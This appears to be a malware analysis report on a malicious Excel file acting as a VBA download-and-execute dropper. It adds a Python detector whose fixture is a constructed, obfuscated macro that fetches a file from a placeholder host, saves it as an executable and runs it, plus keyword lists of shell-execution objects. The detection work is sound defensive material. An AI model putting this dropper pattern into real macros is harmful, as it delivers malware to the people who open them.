Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 64413387408791eb…

MALICIOUS

Office (OLE) / .XLS

Size: 84.5 KB | Created: 2022-08-09 11:01:09 | Authoring application: Microsoft Excel | First seen: 2022-08-09
MD5: 5dd794b694dd7fbde7f1002dda3d6244
SHA-1: fa6151cf2e594239b615cf119f2982d14d3d9646
SHA-256: 64413387408791ebc4e35419e7db96cfb57e26d4c6bdcbf5ac5f244b18819c5c
Risk Score: 160

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_HTTP_DROP_EXEC fires because the VBA code reads an HTTP response body and writes it to disk through an ADODB.Stream SaveToFile call. The high-severity heuristics OLE_VBA_CREATEOBJ and OLE_VBA_GETOBJ show the macros instantiating COM objects by ProgID, which is how a macro obtains an HTTP client for the download, a stream object for the write and a shell object to launch what it dropped. Because the scanner matches on that behaviour rather than on literal ProgID strings, the verdict holds even where the ProgIDs are assembled at run time to defeat keyword matching. The macro source is heavily obfuscated, but its core function is that of a download-and-execute dropper: fetch a second-stage payload from an HTTP URL, save it to disk and run it. This is a static result: the only artifact carved from the sample is the decoded macro source, so the second-stage payload itself was not retrieved and its family cannot be determined from this report alone.

Heuristics 4

  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject instantiates a COM object by ProgID (for example an XMLHTTP client, ADODB.Stream or WScript.Shell). On its own it is common in legitimate macros; the severity comes from its use alongside the download-and-drop chain above.
  • GetObject call high OLE_VBA_GETOBJ
    GetObject binds to an already running object or to a moniker. Like CreateObject it is a COM entry point through which the macro can reach a shell or process-creation interface to execute the dropped file.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
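The following is an added example, not the analysis platform's scanner and not code from this sample: a small Python scan over decoded VBA source that reproduces the logic the OLE_VBA_HTTP_DROP_EXEC heuristic and the summary above describe. It first folds Chr(), StrReverse() and "a" & "b" concatenations into literals and propagates single-literal variables into CreateObject()/GetObject() calls, then looks for the HTTP client, the ADODB.Stream SaveToFile write and an auto-exec or execution path. The two VBA snippets embedded in it are constructed for illustration (the ProgIDs, URL and filenames are invented), and the heuristic name, keyword lists and thresholds are this example's own assumptions.

```python
"""Heuristic scan of decoded VBA source for an HTTP download-and-drop chain.

Added example modelled on the OLE_VBA_HTTP_DROP_EXEC heuristic described in
this report; it is not the analysis platform's own scanner, and the VBA
below is constructed for illustration, not the macro carved from this sample.
"""
import re

# Constructed sample: the COM ProgIDs are assembled at run time with Chr() and
# "&" concatenation so that a plain grep for "ADODB.Stream" would miss them.
SAMPLE_VBA = r'''
Sub Workbook_Open()
    Dim a, b
    a = "MSX" & "ML2." & "XMLH" & "TTP"
    b = Chr(65) & Chr(68) & "ODB." & "Str" & "eam"
    Set x = CreateObject(a)
    x.Open "GET", "http://example.invalid/stage2.dat", False
    x.Send
    Set s = CreateObject(b)
    s.Type = 1
    s.Open
    s.Write x.responseBody
    s.SaveToFile Environ("TEMP") & "\upd.exe", 2
    Set w = GetObject("winmgmts:").Get("Win32_Process")
    w.Create Environ("TEMP") & "\upd.exe"
End Sub
'''

# Constructed control: an auto-exec macro with no network or file activity.
BENIGN_VBA = r'''
Sub Workbook_Open()
    Sheets("Sheet1").Range("A1").Value = "opened"
End Sub
'''

CHR_RE = re.compile(r'Chr[WB]?\(\s*(\d+)\s*\)', re.I)
STRREV_RE = re.compile(r'StrReverse\(\s*"([^"]*)"\s*\)', re.I)
CONCAT_RE = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
PROGID_RE = re.compile(r'(?:CreateObject|GetObject)\(\s*"([^"]+)"', re.I)
AUTOEXEC = ('workbook_open', 'auto_open', 'document_open', 'autoopen',
            'workbook_activate')
HTTP_CLIENTS = ('msxml2.xmlhttp', 'msxml2.serverxmlhttp', 'microsoft.xmlhttp',
                'winhttp.winhttprequest')
EXEC_HINTS = ('wscript.shell', 'shell.application', 'win32_process',
              'shellexecute', 'shell(')


def _chr(m):
    n = int(m.group(1))
    # Chr(34) would yield a bare quote and break the literal syntax; leave
    # it and any non-printable code point untouched.
    return m.group(0) if n == 34 or not 32 <= n < 127 else '"%s"' % chr(n)


def fold_strings(src):
    """Rewrite Chr(n), StrReverse("..") and "a" & "b" into single literals,
    repeating until no further reduction applies."""
    prev = None
    while prev != src:
        prev = src
        src = CHR_RE.sub(_chr, src)
        src = STRREV_RE.sub(lambda m: '"%s"' % m.group(1)[::-1], src)
        src = CONCAT_RE.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
    return src


def propagate_constants(src):
    """Substitute variables that hold one string literal into
    CreateObject(var) / GetObject(var) calls."""
    for name, value in ASSIGN_RE.findall(src):
        pat = r'\b(CreateObject|GetObject)\(\s*%s\s*\)' % re.escape(name)
        src = re.sub(pat, lambda m, v=value: '%s("%s")' % (m.group(1), v),
                     src, flags=re.I)
    return src


def naive_keyword_hit(src):
    """What a plain keyword scanner sees on the raw, unfolded source."""
    return 'adodb.stream' in src.lower()


def scan(src):
    """Return (findings, verdict); verdict is the heuristic name or None."""
    folded = propagate_constants(fold_strings(src))
    low = folded.lower()
    findings = {
        'progids': PROGID_RE.findall(folded),
        'autoexec': any(name in low for name in AUTOEXEC),
        'http_client': any(p in low for p in HTTP_CLIENTS),
        'url': re.search(r'"https?://[^"]+"', folded, re.I) is not None,
        'stream_drop': 'adodb.stream' in low and 'savetofile' in low,
        'exec': any(h in low for h in EXEC_HINTS),
    }
    drop_exec = (findings['http_client'] and findings['stream_drop']
                 and (findings['autoexec'] or findings['exec']))
    return findings, 'OLE_VBA_HTTP_DROP_EXEC' if drop_exec else None


if __name__ == '__main__':
    for label, src in (('constructed dropper', SAMPLE_VBA), ('control', BENIGN_VBA)):
        findings, verdict = scan(src)
        print(label, '| raw keyword hit:', naive_keyword_hit(src),
              '| verdict:', verdict)
        for key, val in findings.items():
            print('  %-12s %s' % (key, val))
```

On the constructed dropper the raw keyword check misses ADODB.Stream entirely, while the folded source exposes MSXML2.XMLHTTP, ADODB.Stream and the winmgmts: moniker and trips the heuristic; the control macro keeps its auto-exec entry point but produces no verdict. Real olevba output is the natural input here: run olevba with --decode on the sample and feed the resulting source to scan().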

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 52f68457c7a42f4b6ac3025d01c3b79465fc6131294018141cb45528bc3cf788
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3832 bytes